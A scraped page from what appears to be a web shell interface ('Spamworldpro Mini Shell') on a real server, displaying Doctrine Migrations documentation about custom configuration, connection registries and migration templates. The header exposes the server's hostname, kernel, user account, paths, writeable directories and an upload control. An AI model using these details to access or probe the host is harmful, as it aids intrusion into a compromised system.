Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/corals/mautic.corals.io/vendor/doctrine/migrations/docs/en/reference/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/corals/mautic.corals.io/vendor/doctrine/migrations/docs/en/reference/custom-configuration.rst
Custom Configuration
====================

It is possible to build a custom configuration where you manually build the ``Doctrine\Migrations\Configuration\Configuration``
instance instead of using YAML, XML, etc. In order to do this, you will need to setup a :ref:`Custom Integration <custom-integration>`.

Once you have your custom integration setup, you can modify it to look like the following:

.. code-block:: php

    #!/usr/bin/env php
    <?php

    require_once __DIR__.'/vendor/autoload.php';

    use Doctrine\DBAL\DriverManager;
    use Doctrine\Migrations\Configuration\Configuration;
    use Doctrine\Migrations\Configuration\Connection\ExistingConnection;
    use Doctrine\Migrations\Configuration\Migration\ExistingConfiguration;
    use Doctrine\Migrations\DependencyFactory;
    use Doctrine\Migrations\Metadata\Storage\TableMetadataStorageConfiguration;
    use Doctrine\Migrations\Tools\Console\Command;
    use Symfony\Component\Console\Application;

    $dbParams = [
        'dbname' => 'migrations_docs_example',
        'user' => 'root',
        'password' => '',
        'host' => 'localhost',
        'driver' => 'pdo_mysql',
    ];

    $connection = DriverManager::getConnection($dbParams);

    $configuration = new Configuration($connection);

    $configuration->addMigrationsDirectory('MyProject\Migrations', '/data/doctrine/migrations-docs-example/lib/MyProject/Migrations');
    $configuration->setAllOrNothing(true);
    $configuration->setCheckDatabasePlatform(false);

    $storageConfiguration = new TableMetadataStorageConfiguration();
    $storageConfiguration->setTableName('doctrine_migration_versions');

    $configuration->setMetadataStorageConfiguration($storageConfiguration);

    $dependencyFactory = DependencyFactory::fromConnection(
        new ExistingConfiguration($configuration),
        new ExistingConnection($connection)
    );

    $cli = new Application('Doctrine Migrations');
    $cli->setCatchExceptions(true);

    $cli->addCommands(array(
        new Command\CurrentCommand($dependencyFactory),
        new Command\DiffCommand($dependencyFactory),
        new Command\DumpSchemaCommand($dependencyFactory),
        new Command\ExecuteCommand($dependencyFactory),
        new Command\GenerateCommand($dependencyFactory),
        new Command\LatestCommand($dependencyFactory),
        new Command\ListCommand($dependencyFactory),
        new Command\MigrateCommand($dependencyFactory),
        new Command\RollupCommand($dependencyFactory),
        new Command\StatusCommand($dependencyFactory),
        new Command\SyncMetadataCommand($dependencyFactory),
        new Command\UpToDateCommand($dependencyFactory),
        new Command\VersionCommand($dependencyFactory),
    ));

    $cli->run();

:ref:`Next Chapter: Migrations Events <events>`


It is possible to use multiple entity managers or connections, this is a way to configure your application:


.. code-block:: php

    #!/usr/bin/env php
    <?php

    require_once __DIR__.'/vendor/autoload.php';

    use Doctrine\DBAL\DriverManager;
    use Doctrine\Migrations\Configuration\Configuration;
    use Doctrine\Migrations\Configuration\Configuration\ExistingConfiguration;
    use Doctrine\Migrations\Configuration\Connection\ConnectionRegistryConnection;
    use Doctrine\Migrations\DependencyFactory;
    use Doctrine\Migrations\Tools\Console\Command;
    use Symfony\Component\Console\Application;

    $connection1 = DriverManager::getConnection([...]);
    $connection2 = DriverManager::getConnection([...]);

    $connectionRegistry = new class(
        'some_registry',
        ['foo' => $connection1, 'bar' => $connection2],
        [], // entity managers
        'foo', // default connection
        null, // default entity manager
        'Doctrine\Persistence\Proxy' // proxy class
    ) extends AbstractManagerRegistry {
        // implement abstract methods here
    };

    $configuration = new Configuration($connection);
    $configuration->addMigrationsDirectory('MyProject\Migrations', 'some path');
    $configurationLoader = new ExistingConfiguration($configuration);

    $connectionLoader = ConnectionRegistryConnection::withSimpleDefault($connectionRegistry);

    $dependencyFactory = DependencyFactory::fromConnection(
        $configurationLoader,
        $connectionLoader
    );

    $cli = new Application('Doctrine Migrations');
    $cli->setCatchExceptions(true);

    $cli->addCommands(array(
        new Command\MigrateCommand($dependencyFactory),
        // more commands here
    ));

    $cli->run();

With this configuration you can use the ``--conn`` parameter to specify a connection that will be used for running
migrations. If the parameter is not passed, it will fallback to the one passed in the configuration,
and if that is also not provided it will fallback to the default connection name specified when creating
the connection registry.

Custom migration template
-------------------------

When the default generated migrations do not suit your needs, you may provide a custom migration template that will
be used to generate future migrations.

For example, if you don't need a ``down`` migration your template could look like this:

.. code-block:: php

    <?php

    declare(strict_types=1);

    namespace <namespace>;

    use Doctrine\DBAL\Schema\Schema;
    use Doctrine\Migrations\AbstractMigration;

    final class <className> extends AbstractMigration
    {
        public function up(Schema $schema): void
        {
            <up>
        }
    }

Placeholders (words inside ``< >``) are replaced with correct code upon generation. All possible wildcards are:

===============  ===============================================
Placeholder      Description
---------------  -----------------------------------------------
``<namespace>``  Namespace of the class, e.g. ``App\Migrations``
``<className>``  Classname, e.g. ``Version20210212092730``
``<up>``         SQL for migrating up
``<down>``       SQL for migrating down
===============  ===============================================

The custom template needs to be configured.

.. code-block:: php

    $configuration->setCustomTemplate(__DIR__ . '/custom_template.tpl');

Spamworldpro Mini